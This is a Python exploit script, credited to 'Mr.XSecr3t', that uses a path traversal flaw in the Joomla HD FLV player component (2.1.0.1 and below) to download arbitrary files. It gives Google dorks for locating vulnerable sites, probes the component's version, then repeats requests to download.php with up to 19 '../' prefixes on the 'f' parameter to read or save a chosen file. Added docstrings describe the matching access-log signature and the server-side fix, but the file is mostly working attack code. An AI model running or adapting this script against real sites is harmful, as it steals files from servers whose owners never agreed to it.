Remote HDFLV Exploit Code Source

  1. #!/usr/bin/env python
  2. #
  3. # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
  4. #
  5. # Exploit Author : Mr.XSecr3t
  6. #
  7. # Vendor Homepage : http://www.hdflvplayer.net/
  8. #
  9. # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
  10. #
  11. # Dork google 1: inurl:/component/hdflvplayer/
  12. # Dork google 2: inurl:com_hdflvplayer
  13. #
  14. # Date : 2016-1-2
  15. #
  16. # Tested on : BackBox 3.x/4.x
  17. #
  18. # Info:
  19. # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
  20. # The variable "f" is not sanitized.
  21. # Over 80.000 downloads (statistic reported on official site)
  22. #
  23. #
  24. # Video Demo : https://www.youtube.com/78c6d77dfXg
  25. #
  26. #
  27. # Http connection
  28. import urllib, urllib2
  29. # String manipulation
  30. import re
  31. # Time management
  32. import time
  33. # Args management
  34. import optparse
  35. # Error management
  36. import sys
  37.  
# ASCII-art banner printed before the usage text and before a run; the
# trailing lines carry the author's contact details verbatim.
banner = """
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \\
|___| | _ | _ | | | _ | |. 1 |. | \\
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'

<= 2.1.0.1 Remote File Download

Written by:

Mr.XSecr3t

https://www.facebook.com/vaniatufik

ICDT@grupcyber.com
anonn404notfound@gmail.com

https://www.facebook.com/groups/IndonesianCyberDarkNetTeam
"""
  67.  
  68. # Check url
def checkurl(url):
    """Return *url* unchanged if it begins with "http://" or "https://".

    Any other prefix prints an error and terminates the process with exit
    status 1 via sys.exit, so callers never receive a scheme-less value.
    """
    # Plain prefix comparison only: the URL is not parsed, so a trailing
    # slash, a path or embedded credentials pass through untouched.
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
  75.  
  76.  
def checkcomponent(url,headers):
    """Print whether the HD FLV component path was "found" on *url*.

    As written this function never contacts the server: the urllib2.Request
    is constructed but never passed to urlopen, so no HTTPError or URLError
    can be raised here and the two except branches are dead code. The
    FOUND line is therefore printed unconditionally.
    """
    try:
        # Builds the request object only; nothing is sent on the wire.
        req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
        sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
        print("")
    except urllib2.HTTPError:
        # Unreachable: no network call precedes this handler.
        sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
        sys.exit(1)
    except urllib2.URLError:
        # Unreachable for the same reason; Python 2 print statement.
        print '[X] Connection Error'
  88.  
def checkversion(url,headers):
    """Print the <version> value from the module manifest XML, if reachable.

    Fetches url/modules/mod_hdflvplayer/mod_hdflvplayer.xml and, for every
    line containing "<version>", prints the text between the first '>' and
    the next '<' on that line. If no line matches, nothing is printed after
    the "Checking Version:" prefix written by the caller. An HTTPError
    prints "Unknown"; a URLError prints a connection error and exits 1.

    Defender note: this works only because the module manifest is served
    directly; blocking direct web access to extension manifest XML files
    removes this version-disclosure signal.
    """
    try:
        req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
        response = urllib2.urlopen(req).readlines()

        for line_version in response:

            # str.find returns -1 when absent, so this reads as
            # "line contains <version>".
            if not line_version.find("<version>") == -1:

                # First ">...<" span on the line; assumes the value sits on
                # the same line as the opening tag. If search() finds no
                # match it returns None and .group raises AttributeError,
                # which is not caught below.
                VER = re.compile('>(.*?)<').search(line_version).group(1)

                sys.stdout.write("\r[+] Checking Version: "+str(VER))
                print("")

    except urllib2.HTTPError:
        sys.stdout.write("\r[+] Checking Version: Unknown")

    except urllib2.URLError:
        print("\n[X] Connection Error")
        sys.exit(1)
  110.  
def connection(url,headers,pathtrav):
    """Request download.php?f= with 1..19 "../" prefixes before *pathtrav*.

    Each iteration prepends one more "../" to the accumulated prefix and
    GETs url/components/com_hdflvplayer/hdflvplayer/download.php?f=<prefix><pathtrav>.
    A non-empty body that does not contain "failed to open stream" is taken
    as success; the user is then prompted for 'd' (re-fetch the same URL
    with urllib.urlretrieve and save it in the current directory under the
    basename of *pathtrav*) or 'r' (print the body), and the function
    returns True. If no depth succeeds it sleeps one second, prints a
    not-found message and returns None.

    Defender note: the access-log signature is a burst of requests to that
    download.php path whose ``f`` parameter carries repeated ``../``
    sequences (up to 19), from one client within seconds; a successful
    depth is followed by a second identical request when 'd' is chosen.
    The remediation on the server side is to resolve ``f`` against the
    intended download directory and reject anything outside it.
    """
    char = "../"
    bar = "#"
    s = ""
    barcount = ""

    # range(1,20) yields 19 attempts; depth 20 and beyond is never tried.
    for a in range(1,20):

        s += char
        barcount += bar
        sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
        sys.stdout.flush()

        try:
            # pathtrav is concatenated verbatim; no URL-encoding is applied.
            req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
            response = urllib2.urlopen(req)

            content = response.read()

            # Success heuristic: a non-empty body without the
            # "failed to open stream" text (presumably the PHP warning the
            # server emits when the file cannot be opened).
            if content != "" and not "failed to open stream" in content:
                print("\n[!] VULNERABLE")
                print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
                print("")
                # Indonesian, roughly: "Download it or read it?"
                print("[+] Mau Didownload apa di Read Cuk?")
                print("[+]")
                sys.stdout.write("\r[+] Mau Didownload apa di Read Cuk?: ")

                download = set(['d'])
                read = set(['r'])

                # Input is lower-cased, so 'D'/'R' are accepted as well.
                while True:
                    choice = raw_input().lower()
                    if choice in download:
                        # Basename of the requested path becomes the local
                        # file name, written into the current directory.
                        filedown = pathtrav.split('/')[-1]
                        urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
                        # Indonesian, roughly: "Done, downloaded!"
                        print("[!] Sip Deh KeDownload!")
                        print("[!] Check file: "+filedown)
                        return True
                    elif choice in read:
                        print("")
                        print content
                        return True
                    else:
                        sys.stdout.write("\r[X] lease respond with 'D' or 'R': ")

        except urllib2.HTTPError:
            # A 4xx/5xx at this depth is ignored; the next depth is tried.
            #print '[X] HTTP Error'
            pass
        except urllib2.URLError:
            # Reported but not fatal: the loop continues with the next depth.
            print '\n[X] Connection Error'

    time.sleep(1)
    # Indonesian, roughly: "The file was not found :("
    print("\n[X] Filenya ga ketemu Cuk -_- :(")
  165.  
# Command-line interface: -t/--target and -f/--file are both required.
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                       )
commandList.add_option('-f', '--file', action="store",
                       help="Insert file to check",
                       )
options, remainder = commandList.parse_args()

# Check args
# Either option missing: print the banner and usage, then exit with status 1.
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

# checkurl terminates the process if the scheme is not http:// or https://.
url = checkurl(options.target)
pathtrav = options.file

# Fixed desktop Chrome User-Agent sent with every request; trivially
# changed, so it is at most a weak indicator in server logs.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

# Three stages in order: component presence, version lookup, then the
# download.php probe. Each stage prints its own result after the prefix
# written here.
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
checkcomponent(url,headers)
sys.stdout.write("\r[+] Checking Version: ")
checkversion(url,headers)
sys.stdout.write("\r[+] Exploiting...please wait:")
connection(url,headers,pathtrav)